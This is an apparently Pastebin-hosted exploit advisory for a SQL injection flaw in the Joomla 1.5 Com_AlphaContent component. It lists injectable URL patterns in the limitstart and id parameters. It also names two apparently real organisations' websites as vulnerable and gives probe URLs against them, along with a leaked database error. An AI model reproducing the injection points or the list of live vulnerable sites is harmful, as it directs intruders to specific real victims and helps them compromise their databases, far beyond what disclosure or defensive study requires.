Advertisement
KingSkrupellos

Joomla 1.5.26 Com_AlphaContent Components 3.x SQL Injection

Aug 23rd, 2019
223
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.41 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Joomla 1.5.26 Com_AlphaContent Components 3.x SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 24/08/2019
  7. # Vendor Homepage : bestofjoomla.com - joomla.org - pensieroliquido.com
  8. # Software Information Link : joomla.info.tr/alphacontent-400-joomla-15-native
  9. bestofjoomla.com/component/option,com_bestofresources/task,detail/Itemid,54/id,754/
  10. # Joomla Affected Version : Joomla 1.5.18 to 1.5.26 - 1.x
  11. # Software Affected Version : Com_AlphaContent 3.x - 3.00 - 4.x - 4.0.0
  12. # Tested On : Windows and Linux
  13. # Category : WebApps
  14. # Exploit Risk : Medium
  15. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  16. Special Elements used in an SQL Command ('SQL Injection') ]
  17. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  18. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  19. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  20.  
  21. ###################################################################
  22.  
  23. # Impact :
  24. ***********
  25. Joomla 1.5.26 Com_AlphaContent Components 3.x is prone to an SQL-injection vulnerability
  26. because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  27. Exploiting this issue could allow an attacker to compromise the application, access or
  28. modify data, or exploit latent vulnerabilities in the underlying database.
  29. A remote attacker can send a specially crafted request to the vulnerable application and
  30. execute arbitrary SQL commands in application`s database. Further exploitation of this
  31. vulnerability may result in unauthorized data manipulation.
  32. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  33.  
  34. ###################################################################
  35.  
  36. # SQL Injection Exploit :
  37. **********************
  38. /index.php?option=com_alphacontent&section=[ID-NUMBER]&Itemid=[ID-NUMBER]&lang=it&limitstart=[SQL Injection]
  39.  
  40. /index.php?option=com_alphacontent&section=weblinks&Itemid=[ID-NUMBER]&lang=de&limitstart=[SQL Injection]
  41.  
  42. /index.php?option=com_alphacontent&section=[ID-NUMBER]&Itemid=[ID-NUMBER]&lang=es&limitstart=[SQL Injection]
  43.  
  44. index.php?option=com_alphacontent&section=[ID-NUMBER]&cat=[ID-NUMBER]&task=view&id=[SQL Injection]
  45.  
  46. ###################################################################
  47.  
  48. # Example Vulnerable Sites :
  49. *************************
  50. Realizzazione Tom Agenzia di Comunicazione and Movimento Turismo del Vino Puglia
  51. is vulnerable to SQL Injection.
  52.  
  53. [+] mtvpuglia.it/index.php?option=com_alphacontent&section=2&Itemid=1&lang=it&limitstart=1%27
  54.  
  55. Society of Polish Town Planners is vulnerable to SQL Injection
  56.  
  57. [+] tup.org.pl/index.php?option=com_alphacontent&section=37&Itemid=1&lang=en&limitstart=50%27
  58.  
  59. ###################################################################
  60.  
  61. # Example SQL Database Error :
  62. ****************************
  63. No valid database connection You have an error in your SQL syntax; check the manual
  64. that corresponds to your MariaDB server version for the right syntax to use near '' at
  65. line 1 SQL=SELECT id, title FROM jos_categories WHERE section='2' AND
  66. published='1' AND `access` <= 0 ORDER BY
  67.  
  68. ###################################################################
  69.  
  70. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  71.  
  72. ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement